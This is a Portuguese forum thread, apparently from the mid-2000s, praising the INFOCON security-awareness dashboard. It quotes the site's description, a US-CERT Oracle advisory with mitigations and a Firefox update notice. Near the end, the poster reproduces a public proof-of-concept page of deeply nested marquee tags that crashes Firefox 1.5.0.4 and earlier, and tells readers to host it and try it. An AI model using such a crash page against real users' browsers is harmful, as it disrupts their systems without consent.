• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

teckV

Apresentar INFOCON - Site Fabuloso de um TUGA

4 mensagens neste tópico

tenho o prazer de apresentar um site fabuloso na área de segurança informática... é um centro de informação (em tempo real) sobre segurança informática na sua vertente mais prática e operacional ao nivel das grandes agencias governamentais... PARABÉNS

DShield Geographic Distribution of Attack Sources

attack_map0.png    screenshot_infocon01.png

http://infocon.sectoid.com/

Top 6 Target Ports 
1026
win-rpc  

4672
eMule  

6881
bittorrent  

38566
---  

445
microsoft-ds  

18338
---  

é um projecto do Valter Santos (um abraço  meu e do staff do forum :cheesygrin: :cheesygrin:) que merece os maiores aplausos... o grandioso trabalho que em muito HONRA o espirito de que tanto falo.. o espirito da comunidade técnica...

conhecendo o Valter digo que este projecto está em excelentes mãos... PARABÉNS   :P:D.. .isto sim é um orgulho para portugal não essa coisa estranha que nada de concreto e positivo nos trás que são esses mundiais de sei lá o que...

About this Website

The INFOCON Tactical Overview Website aims to provide information about the actual security state of the Internet: the Information Operations Condition, INFOCON for short.

This site agregates security information from various sources, and displays InfoCon states from various entities (such ISC, Symantec, ISS, ...), allowing you to put a quick glance of what's going on the Internet.

Firstly based on the Talisker Radar, the INFOCON Tactical Overview rapidly has grown to something more polished to better suit my own needs of information.

Althought the INFOCON Tactical Overview has various sections, its heart is the tactical page, that in a security console style, displays the catch on what is going on. This page was designed with Security Operations Centers (SOC) plasma displays in mind to allow all the team to keep a current glance on the security state.

So if you have a spare display flying around, click here :-)

Author

The INFOCON Tactical Overview is brought to you by Valter Santos, a security freak from Portugal . If you have any suggestion to improve this website, just let me know. If you like it and use it on your SOC/NOC, please be kind enough to send me a photo of it in action :-)

Contact me via  contact_email.gif

teckV

house of horus

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

começo por dizer que me aconteceu uma cena muito estranha... tinmha o browser todo engadanhado e tava a tentar recortar uma citação do pedrotuga e apaguei sem querer uma resposta dele a este tópico... todos aqui sabem que não é essa a minha forma de lidar com posts... foi mesmo uma acidente... ser lamer de vez em quando até faz bem... alguem sabe porque?? duvidas existencias

o pedrotuga desvalorizou este site dizendo que é apenas 5 feeds... nada de especial no site e achou ridiculo o efase que eu dei a este site...

pois.. primeiro..  se explorarem por 5 minutos vão ver que é muito maius do que isso

outra coisa... para os profissionais de segurança essa informação é tipo a cena da bolsa para os investidores... acham ridiculo aquelas cenas nos sites da bolsa que apresentam em tempo real as cotações? então porque acham ridiculo que exista esse tipo de serviços para os profissionais de segurança?

eu achei que podiam ter curiosidade em saber com o que é que lidam os profissionais de segurança... como sabem sou especialista de segurança informática e um dos muitissimo poucos "Penetration Testers" ewm portugal... por isso somos tão mal compreendidos... tenho feito tudo para icentivar novos "Pen Testers" em lusitania e desmistificar esta actividade... ser HACKER PROFISSIONAL... o topo da montanha

este site é um MUST... tenho-o sempre aberto para estar atento em tempo real ao que acontece... é obvio que para o comum dos mortais será apenas uma curiosidade... mas acho interessante a todas as pessoas que mexem na internet estarem atentas ao que se passa.

este site REUNE a informação "que interessa" a partir da imensidão que é a internet, a informção por si não é nada... têm de estar organizada... um problema da internet é muita informação e toda desorganizada... isso é muito mau pois estraga a informação e anula-a ou até lhe dá contornos negativos

os especialistas de segurança precisam comfigurar os equipamentos para eles responderem como deve ser... é um trabalho arduo e muito complexo e esta informação apresentada no site é crucial... é preciso saber quais as ultimas técnicas, metodos, vulnerabilidades e exploits em uso o mais rapido possivel... na segurança o TEMPO é crucial... se nos atrasarmos é o sufeciente para ser aplicado um exploit à nossa rede... há crackers a toda  a hora a efectuar scans à procura dessas vulnerabilidades... e sites de alto valor nem se fala... nunca perguntaram o que são aquelas entradas todas nos logs das firewalls?? muito lixo e ruido(criado de proposito)... e no meio disso disfarçadamente???  e o que acham melhor... ir a 10 sites ou ver toda a info que necessitam num só?

uma coisa notavel que os desatentos não reparam é a qualidade da informação... aqui é apresentada informação selecionada das melhores fontes, já filtrada (o qeu mais interessa) e é apresentada de uma forma espetacular e integrada

isto é tipo um PAINEL DE ALERTA E INFORMAçAO EM TEMPO REAL... tipo aqueles paineis das agencias governamentais dos states com info sempre a pssar em rodapé... já viram o centro de control da NSA? não é nasa é NSA... vejam e vão ver que é quase identico...

uma TOUR pelo site:

temos apresentaão de Exploits, Vulnerabilidades, Virus, Uso de Portos... patches, Assinaturas de IDS/IPS e Anti-virus... tudo o que interessa...

na home page temos um Overview espetacular da situação a nivel de segurança informática...

Internet Storm Center Diary

Current Threat Activity

Critical Vulnerabilities

aqui são apresentadas as ultimas vulnerabilidades (possibilidades de "entrar num sistema").. esta info é muito importante para quem têm responsabilidades em sistemas "quentes/onde mexe muita guita" para que possam tomar medidas de prevenção contra essas vulnerabilidades... para as quais muitas vezes ainda não há patches dos fabricantes e é importante conhecer-se o ataque para configurar os serviços de forma a que se protejam e identifiquem essas actividades...

por exemplo: podem ver uma vulnerabilidade referente ao Database Server Oracle "Public Exploit Code for Unpatched Vulnerability in Oracle "... neste site podem logo ser enviados para uma página com detalhe (isto é mesmo espectacular e super util... poupa a necessidade de andar em não sei quantos sites no meio de não sei quanta info que não interessa à procura de uma agulha num palheiro... muitas vezes quando se encotontra já é tarde e muitas outras passam-nos completamente oa lado)

vejam o detalhe em http://www.us-cert.gov/current/index.html#unpatorcle  ... o link está no INFOCON... em destaque.. thanks ao criador  :D

US-CERT is aware of publicly available, working exploit code for an unpatched vulnerability in Oracle Export Extensions. Successful exploitation may allow a remote attacker with some authentication credentials to execute arbitrary SQL statements with elevated privileges. This may allow an attacker to access and modify sensitive information within an Oracle database.

neste site apontado pelo INFOCON podem ver logo algumas medidas imediatas a tomar...

US-CERT recommends the following actions to mitigate the security risks:

Restrict access to Oracle:

Only known and trusted users should be granted access to Oracle. Additionally, user accounts should be granted only those privileges needed to perform necessary tasks.

Change login credentials for default Oracle accounts:

Oracle creates numerous default accounts when it is installed. Upon installation, accounts that are not needed should be disabled and the login credentials for needed accounts should be changed.

We will continue to update current activity as more information becomes available

ou esta vulnerabilidade terrivel no FireFox...

Description: Mozilla Foundation released version 1.5.0.4 for Firefox browser as well as Thunderbird email client last week. The new versions fix 12 vulnerabilities in Firefox and 8 vulnerabilities in Thunderbird. The most severe of the vulnerabilities can allow a webpage or an HTML email to execute arbitrary code on a user's system. The technical details about the low severity flaws can be obtained from the Mozilla bugzilla. The details about the code execution flaws are not available yet.

Status: Upgrade to Firefox and Thunderbird to version 1.5.0.4

References:

sabem o que isto significa?? é bom que saibam... ACTUALIZEM IMEDIATAMENTE O FIREFOX PARA A VERSÃO 1.5.0.4... informação UTIL não?  :)

allow a webpage or an HTML email to execute arbitrary code on a user's system

e agora a zona mais marada de toda a tecnologia já criada pelo homem... a cena dos EXPLOITS

http://infocon.sectoid.com/threats/exploits

ora vamos lá analisar isto...

"moz1504.txt

Denial of service proof of concept for Mozilla Firefox versions 1.5.0.4 and below that makes use of marquee. "

que é isto? vou-vos explicar em pormenor (eu nunca apresentei coisas técnicas pois não?h3h3h33h :rant_01:) o uso de uma EXPLOIT (em primeira mão no forum  ;):thumbsup:)... vou usar um simples para que todos percebam... quando tiversmo a zona de segurança vou explicar outros tipo "remote code execution" (apesar disto não existir h333h3h  :thumbsup:)

o INFOCON apontanos para o PacketStorm (sem comentários) onde podem fazer o download deste ficheiro http://packetstormsecurity.org/0606-exploits/moz1504.txt

<html>
<head>
<title>Credit's go to n00b</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

para quem nunca tinha visto um Exploit... isto é um EXPLOIT... é claro que há todo o tipo de exploits e este é dos mais basicos e simpels mas é um exemplo facil de entender...

gravem num site vosso como file HTML e depois com Firefox numa versão 1.5.0.4 ou anterior e "Credit's go to n00b</"

percebem a extrema importancia e utilidade deste site para especialistas de segurança informática?

e quando não entenderem algo não mandem abaixo... pode haver uma razão que desconhecem para as coisas serem como são... é muito mau para os criadores lerem certos coméntarios sem sentido... mas que desmotivam quem nos cria estas coisas que adoramos utilizar...

é muito importante valorizar quem realmente faz... uma opinião singela

:thumbsup:

teckV - horusNimda - hydroPhone

house of horus - by the sun

:shocking:

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora